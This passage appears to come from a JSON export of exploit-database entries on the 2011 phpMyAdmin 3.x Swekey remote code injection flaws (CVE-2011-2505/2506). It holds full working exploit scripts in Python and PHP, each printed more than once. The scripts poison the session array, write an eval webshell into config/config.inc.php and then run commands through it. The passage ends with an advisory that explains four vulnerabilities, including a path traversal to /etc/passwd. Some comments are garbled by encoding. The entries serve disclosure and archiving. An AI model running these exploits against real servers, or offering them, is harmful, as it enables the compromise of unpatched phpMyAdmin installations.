urllib2.urlopen(url, postdata)\n print \"[+] All done, pray for your lucky!\"\n\n # \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell\n url = args[1]+\"/config/config.inc.php\"\n opener.addheaders.append(('Code', 'phpinfo();'))\n urllib2.install_opener(opener)\n print \"[+] Trying connect shell: %s\" % url\n result = re.findall(\"System \\</td\\>\\<td\nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read())\n if len(result) == 1:\n print \"[+] Lucky u! 
System info: %s\" % result[0]\n print \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\"\n\n else:\n print \"[-] Cannot get webshell.\"\n\n except Exception, e:\n print e\n\nif __name__ == \"__main__\" : main(sys.argv)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin 3.x - Swekey Remote Code Injection", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "exploitpack", "title": "phpMyAdmin 3.x - Swekey Remote Code Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E", "href": "", "sourceData": "<?php /*\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\n# Date: 2011-07-09\n# Author: Mango of ha.xxor.se\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \n# CVE : CVE-2011-2505, CVE-2011-2506\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\n*/\necho php_sapi_name()!=='cli'?'<pre>':'';?>\n .\n , )\\ .\n . 
,/) , / ) , )\\\n )\\( /)/( (__( /( / ) __ __ ________ __ __\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\n Remote Code Injection [] [][] [] [] [] [] [] []\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \n\t _ _ ___ __ ____ __ ___ ___ \n\t| |-| || _ |\\ /\\ /| _ || ) \n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \n ___ ___ ___ _ _ ___ ___ __ __ \n ( < | [_ / /| || || )(_)| |\\ | /\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\n\nUse responsibly.\n\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\n\nif(php_sapi_name()==='cli'){\n\tif(!isset($argv[1])){\n\t\toutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\n\t\tkillme();\n\t}\n\t$pmaurl = $argv[1];\t\n}else{\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\n}\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\n$cookie = null;\n$token = null;\nif(!function_exists('curl_init')){\n\toutput('[!] Fatal error. 
Need cURL!');\n\tkillme();\n}\n$ch = curl_init();\n$debug = 0;\nif(php_sapi_name()!=='cli'){\n?>\n<form method=post>\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\n<input name=submit type=submit value=\u2665>\n</form>\n<pre>\n<?php\nif(!isset($_REQUEST['submit']))killme(true);\n}\n\noutput(\"[i] Running...\");\n\n// Start a session and get a token\ncurl_setopt_array($ch, array(\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\n\tCURLOPT_HEADER => 1,\n\tCURLOPT_RETURNTRANSFER => 1,\n\tCURLOPT_TIMEOUT => 4,\n\tCURLOPT_SSL_VERIFYPEER => false,\n\tCURLOPT_SSL_VERIFYHOST => false\n));\noutput(\"[*] Contacting server to retrive session cookie and token.\");\n\n$result = curl_exec($ch);\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\n\toutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\n\tkillme();\n}\nif(!$result){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\nif(false !== strpos($result, 'Cannot load or save configuration')){\n\toutput(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\");\n\tkillme();\n}\n\n// Extract cookie\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\n$cookie = $matches[1];\noutput(\"[i] Cookie:\".$cookie);\n// Extract token\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\n$token = $matches[2];\noutput(\"[i] Token:\".$token);\n\n// Poison _SESSION variable\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] 
cURL error:\".curl_error($ch));\n\tkillme();\n}\n\n//echo htmlspecialchars($result,ENT_QUOTES);\n\n// Save file\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\ncurl_setopt($ch, CURLOPT_POST, 1);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\n\n//echo htmlspecialchars($result,ENT_QUOTES);\n\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\ncurl_setopt($ch, CURLOPT_POST, 0);\noutput(\"[*] Contacting server to test if the injected code executes.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\n\toutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\n\toutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\n}else{\n\toutput(\"[!] Code injection failed. 
This instance of phpMyAdmin does not apear to be vulnerable.\");\n}\n\n\ncurl_close($ch);\n\nfunction output($msg){\n\techo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\n\tflush();\n}\n\nfunction killme(){\n\toutput(\"[*] Exiting...\");\n\techo php_sapi_name()!=='cli'?'<pre>':'';\n\tdie();\n}\n\necho php_sapi_name()!=='cli'?'<pre>':'';?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:51", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "packetstorm", "title": "phpMyAdmin3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "PACKETSTORM:102941", "href": "https://packetstormsecurity.com/files/102941/phpMyAdmin3-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# coding=utf-8 \n# pma3 - phpMyAdmin3 remote code execute exploit \n# Author: wofeiwo<wofeiwo@80sec.com> \n# Thx Superhei \n# Tested on: 3.1.1, 3.2.1, 3.4.3 \n# CVE: CVE-2011-2505, CVE-2011-2506 \n# Date: 2011-07-08 \n# Have fun, DO *NOT* USE IT TO DO BAD THING. \n################################################ \n \n# Requirements: 1. \"config\" directory must created&writeable in pma directory. \n# 2. session.auto_start = 1 in php.ini configuration. 
\n \n \nimport os,sys,urllib2,re \n \ndef usage(program): \nprint \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code \nexecute exploit\" \nprint \"Usage: %s <PMA_url>\" % program \nprint \"Example: %s http://www.test.com/phpMyAdmin\" % program \nsys.exit(0) \n \ndef main(args): \ntry: \nif len(args) < 2: \nusage(args[0]) \n \nif args[1][-1] == \"/\": \nargs[1] = args[1][:-1] \n \n# \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd \nprint \"[+] Trying get form token&session_id..\" \ncontent = urllib2.urlopen(args[1]+\"/index.php\").read() \nr1 = re.findall(\"token=(\\w{32})\", content) \nr2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content) \n \nif not r1: \nr1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content) \nif not r2: \nr2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content) \nif len(r1) < 1 or len(r2) < 1: \nprint \"[-] Cannot find form token and session id...exit.\" \nsys.exit(-1) \n \ntoken = r1[0] \nsessionid = r2[0] \nprint \"[+] Token: %s , SessionID: %s\" % (token, sessionid) \n \n# \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5 \nprint \"[+] Trying to insert payload in $_SESSION..\" \nuri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\" \nurl = args[1]+uri \n \nopener = urllib2.build_opener() \nopener.addheaders.append(('Cookie', 'phpMyAdmin=%s; \npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % \n(sessionid, sessionid))) \nurllib2.install_opener(opener) \nurllib2.urlopen(url) \n \n# \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell \nprint \"[+] Trying get webshell..\" \npostdata = 
\n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\" \n% (sessionid, token) \nurl = args[1]+\"/setup/config.php\" \n \n# print \"[+]Postdata: %s\" % postdata \nurllib2.urlopen(url, postdata) \nprint \"[+] All done, pray for your lucky!\" \n \n# \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell \nurl = args[1]+\"/config/config.inc.php\" \nopener.addheaders.append(('Code', 'phpinfo();')) \nurllib2.install_opener(opener) \nprint \"[+] Trying connect shell: %s\" % url \nresult = re.findall(\"System \\</td\\>\\<td \nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read()) \nif len(result) == 1: \nprint \"[+] Lucky u! System info: %s\" % result[0] \nprint \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\" \n \nelse: \nprint \"[-] Cannot get webshell.\" \n \nexcept Exception, e: \nprint e \n \nif __name__ == \"__main__\" : main(sys.argv) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102941/pma3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:25", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 3.x Swekey Remote Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "PACKETSTORM:102940", "href": "https://packetstormsecurity.com/files/102940/phpMyAdmin-3.x-Swekey-Remote-Code-Injection.html", "sourceData": "`<?php /* \n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit \n# Date: 2011-07-09 \n# Author: Mango of ha.xxor.se \n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \n# CVE : CVE-2011-2505, CVE-2011-2506 \n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt \n# Details: 
http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html \n*/ \necho php_sapi_name()!=='cli'?'<pre>':'';?> \n. \n, )\\ . \n. ,/) , / ) , )\\ \n)\\( /)/( (__( /( / ) __ __ ________ __ __ \n/ \\ ( )| |) \\ / | |\\ /| | | | | | | | (__) \n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \n\\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | | \n| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| \n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \nphpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] \nRemote Code Injection [] [][] [] [] [] [] [] [] \nhttp://ha.xxor.se [][] [] [] [] [][] [][] [] [] \n_ _ ___ __ ____ __ ___ ___ \n| |-| || _ |\\ /\\ /| _ || ) \n|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \n___ ___ ___ _ _ ___ ___ __ __ \n( < | [_ / /| || || )(_)| |\\ | / \n>__)|_[_ \\__\\|____||_|_\\|_| |_| |_| \n \nUse responsibly. \n \n<?php echo php_sapi_name()!=='cli'?'</pre>':''; \n \nif(php_sapi_name()==='cli'){ \nif(!isset($argv[1])){ \noutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\"); \nkillme(); \n} \n$pmaurl = $argv[1]; \n}else{ \n$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; \n} \n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);'; \n$cookie = null; \n$token = null; \nif(!function_exists('curl_init')){ \noutput('[!] Fatal error. 
Need cURL!'); \nkillme(); \n} \n$ch = curl_init(); \n$debug = 0; \nif(php_sapi_name()!=='cli'){ \n?> \n<form method=post> \nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/> \n<input name=submit type=submit value=\u2665> \n</form> \n<pre> \n<?php \nif(!isset($_REQUEST['submit']))killme(true); \n} \n \noutput(\"[i] Running...\"); \n \n// Start a session and get a token \ncurl_setopt_array($ch, array( \nCURLOPT_URL => $pmaurl.'/setup/index.php', \nCURLOPT_HEADER => 1, \nCURLOPT_RETURNTRANSFER => 1, \nCURLOPT_TIMEOUT => 4, \nCURLOPT_SSL_VERIFYPEER => false, \nCURLOPT_SSL_VERIFYHOST => false \n)); \noutput(\"[*] Contacting server to retrive session cookie and token.\"); \n \n$result = curl_exec($ch); \nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ \noutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\"); \nkillme(); \n} \nif(!$result){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \nif(false !== strpos($result, 'Cannot load or save configuration')){ \noutput(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\"); \nkillme(); \n} \n \n// Extract cookie \npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches); \n$cookie = $matches[1]; \noutput(\"[i] Cookie:\".$cookie); \n// Extract token \npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches); \n$token = $matches[2]; \noutput(\"[i] Token:\".$token); \n \n// Poison _SESSION variable \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); \ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); \noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] 
cURL error:\".curl_error($ch)); \nkillme(); \n} \n \n//echo htmlspecialchars($result,ENT_QUOTES); \n \n// Save file \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); \ncurl_setopt($ch, CURLOPT_POST, 1); \ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); \noutput(\"[*] Contacting server to make it save the injected code to a file.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \n \n//echo htmlspecialchars($result,ENT_QUOTES); \n \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); \ncurl_setopt($ch, CURLOPT_POST, 0); \noutput(\"[*] Contacting server to test if the injected code executes.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ \noutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\"); \noutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\"); \n}else{ \noutput(\"[!] Code injection failed. 
This instance of phpMyAdmin does not apear to be vulnerable.\"); \n} \n \n \ncurl_close($ch); \n \nfunction output($msg){ \necho php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\"; \nflush(); \n} \n \nfunction killme(){ \noutput(\"[*] Exiting...\"); \necho php_sapi_name()!=='cli'?'<pre>':''; \ndie(); \n} \n \necho php_sapi_name()!=='cli'?'<pre>':'';?> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102940/phpmyadminswekey-inject.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:13:24", "description": "", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 3.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-08T00:00:00", "id": "PACKETSTORM:102908", "href": "https://packetstormsecurity.com/files/102908/phpMyAdmin-3.x-Remote-Code-Execution.html", "sourceData": "`phpMyAdmin 3.x Multiple Remote Code Executions \n \nThis post details a few interesting vulnerabilities I found while relaxing and reading the sourcecode of phpMyAdmin. My original advisory can be found here. \n \nIf you would like me to audit your PHP project, check out Xxor's PHP code auditing service. 
\n \nThe first vulnerability \nFile: libraries/auth/swekey/swekey.auth.lib.php \nLines: 266-276 \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Variable Manipulation \nAssigned CVE id: CVE-2011-2505 \nPMA Announcement-ID: PMASA-2011-5 \n \n266 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) \n267 { \n268 parse_str($_SERVER['QUERY_STRING']); \n269 session_write_close(); \n270 session_id($session_to_unset); \n271 session_start(); \n272 $_SESSION = array(); \n273 session_write_close(); \n274 session_destroy(); \n275 exit; \n276 } \n \nNotice the call to parse_str on line 268 that passes the query string as it's first argument. It's missing a second argument. This means that what ever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit there ain't much to exploit. However the session variables persists between requests. Thus giving us full control of the $_SESSION array. \n \nFrom here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities. \n \n \nThe second vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Remote Static Code Injection \nAssigned CVE id: CVE-2011-2506 \nPMA Announcement-ID: PMASA-2011-6 \n \nFile: setup/lib/ConfigGenerator.class.php \nLines: 16-78 \n16 /** \n17 * Creates config file \n18 * \n19 * @return string \n20 */ \n21 public static function getConfigFile() \n22 { \n23 $cf = ConfigFile::getInstance(); \n24 \n25 $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? \"\\r\\n\" : \"\\n\"; \n26 $c = $cf->getConfig(); \n27 \n28 // header \n29 $ret = '<!--?php' . $crlf \n30 . '/*' . $crlf \n31 . ' * Generated configuration file' . $crlf \n32 . ' * Generated by: phpMyAdmin ' \n33 . $GLOBALS['PMA_Config']--->get('PMA_VERSION') \n34 . ' setup script' . $crlf \n35 . ' * Date: ' . date(DATE_RFC1123) . 
$crlf \n36 . ' */' . $crlf . $crlf; \n37 \n38 // servers \n39 if ($cf->getServerCount() > 0) { \n40 $ret .= \"/* Servers configuration */$crlf\\$i = 0;\" . $crlf . $crlf; \n41 foreach ($c['Servers'] as $id => $server) { \n42 $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . \" [$id] */\" . $crlf \n43 . '$i++;' . $crlf; \n44 foreach ($server as $k => $v) { \n45 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n46 $ret .= \"\\$cfg['Servers'][\\$i]['$k'] = \" \n47 . (is_array($v) && self::_isZeroBasedArray($v) \n48 ? self::_exportZeroBasedArray($v, $crlf) \n49 : var_export($v, true)) \n50 . ';' . $crlf; \n51 } \n52 $ret .= $crlf; \n53 } \n54 $ret .= '/* End of servers configuration */' . $crlf . $crlf; \n55 } \n56 unset($c['Servers']); \n57 \n58 // other settings \n59 $persistKeys = $cf->getPersistKeysMap(); \n60 \n61 foreach ($c as $k => $v) { \n62 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n63 $ret .= self::_getVarExport($k, $v, $crlf); \n64 if (isset($persistKeys[$k])) { \n65 unset($persistKeys[$k]); \n66 } \n67 } \n68 // keep 1d array keys which are present in $persist_keys (config.values.php) \n69 foreach (array_keys($persistKeys) as $k) { \n70 if (strpos($k, '/') === false) { \n71 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n72 $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf); \n73 } \n74 } \n75 $ret .= '?>'; \n76 \n77 return $ret; \n78 } \n \nOn line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code. \nOn line 26 the $c array is created from a call to $cf->getConfig(). 
\n \nFile: libraries/config/ConfigFile.class.php \nLines: 469-482 \n469 /** \n470 * Returns configuration array (full, multidimensional format) \n471 * \n472 * @return array \n473 */ \n474 public function getConfig() \n475 { \n476 $c = $_SESSION[$this->id]; \n477 foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) { \n478 PMA_array_write($map_to, $c, PMA_array_read($map_from, $c)); \n479 PMA_array_remove($map_from, $c); \n480 } \n481 return $c; \n482 } \n \nBingo! The $c array is derived from the $_SESSION array hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. Then we would just browse to this file and the webserver would executed it. \n \nThis vulnerability requires one specific condition. The config directory must have been left in place after the initial configuration. This is something advised against and hence a majority of servers wont be susceptible to this attack. Therefor we'll check out a third and a fourth vulnerability. 
\n \n \nThe third vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Authenticated Remote Code Execution \nAssigned CVE id: CVE-2011-2507 \nPMA Announcement-ID: PMASA-2011-7 \n \nFile: server_synchronize.php \nLine: 466 \n466 $trg_db = $_SESSION['trg_db']; \nLine: 477 \n477 $uncommon_tables = $_SESSION['uncommon_tables']; \nLine: 674 \n674 PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false); \nFile: libraries/server_synchronize.lib.php \nLines: 613-631 \n613 function PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display) \n614 { \n615 if (isset($uncommon_tables[$table_index])) { \n616 $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link); \n617 $fields = array(); \n618 foreach ($fields_result as $each_field) { \n619 $field_name = $each_field['Field']; \n620 $fields[] = $field_name; \n621 } \n622 $uncommon_tables_fields[$table_index] = $fields; \n623 \n624 $Create_Query = PMA_DBI_fetch_value(\"SHOW CREATE TABLE \" . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link); \n625 \n626 // Replace the src table name with a `dbname`.`tablename` \n627 $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/', \n628 PMA_backquote($trg_db) . '.' .PMA_backquote($uncommon_tables[$table_index]), \n629 $Create_Query, \n630 $limit = 1 \n631 ); \n \nThe variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject what ever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into a remote code execution. 
Basicly we can inject the \"e\" modifier into the regexp pattern which causes the second argument to be executed as PHP code. \n \nThis vulnerability have two major restrictions from an attackers perspective. First the Suhosin patch that completly defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need to have previous knowledge of credentials to an account of the database that phpMyAdmin is set up to manage. Except for some obscure configurations that allows us to bypass this restriction. \n \nSince the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability. \n \n \nThe fourth vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Path Traversal \nAssigned CVE id: CVE-2011-2508 \nPMA Announcement-ID: PMASA-2011-8 \n \nFile: libraries/display_tbl.lib.php \nLines: 1291-1299 \n1291 if ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) { \n1292 \n1293 if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) { \n1294 $include_file = $GLOBALS['mime_map'][$meta->name]['transformation']; \n1295 \n1296 if (file_exists('./libraries/transformations/' . $include_file)) { \n1297 $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']); \n1298 \n1299 require_once './libraries/transformations/' . $include_file; \n \n \nThis fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to \"../../../../../../etc/passwd\" the local passwd-file could show up. 
\n \nThis vulnerability can only be reached if we're authenticated and requires that the transformation feature is setup correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability. \n \nFile: libraries/display_tbl.lib.php \nLines: 707-710 \n707 if ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) { \n708 require_once './libraries/transformations.lib.php'; \n709 $GLOBALS['mime_map'] = PMA_getMIME($db, $table); \n710 } \nAnd the fact that $GLOBALS['mime_map'] is conditionally initialized together with the fact that phpMyAdmin registers all request variables in the global namespace (blacklists some, but not mime_map) allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not setup correctly. \n \n \nSummary \n \nIf the config folder is left in place, phpMyAdmin is vulnerable. \n \nIf an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable. \n \nIf an attacker has access to database credentials and knows how to exploit a local file inclution, phpMyAdmin is vulnerable. 
